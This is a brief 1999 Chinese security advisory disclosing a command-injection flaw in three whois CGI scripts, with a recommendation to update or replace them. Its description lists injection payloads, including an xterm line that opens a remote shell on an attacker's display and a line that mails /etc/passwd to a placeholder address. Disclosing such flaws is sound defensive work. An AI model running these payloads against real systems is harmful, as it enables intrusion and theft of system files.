发布日期：1999-12-15
更新日期：1999-12-15

受影响系统：

Whois Internic Lookup - version: 1.0
CC Whois - Version: 1.0
Matt's Whois - Version: 1

描述：

---

由于以上版本的whois CGI程序没有过滤shell命令字符，如果向其输入如下查询字符串时，将会执行其中的命令：

1) ;commands
2) ";commands
3) ;commands;

如：
输入whois查询字符串：

1) ;id
2) ";id
3) ;id;

将得到如下输出：

uid=501(blah) gid=500(blah)'

另外一些例子：

;xterm -display ip:0.0 -rv -e /bin/sh
";uname -a;whoami;w;ls -al
;cat /etc/passwd|mail you@yourdomain.com;





测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

请参见描述内容。




建议：

---

更新或更换CGI程序。




浏览次数：8058
严重程度：0（网友投票）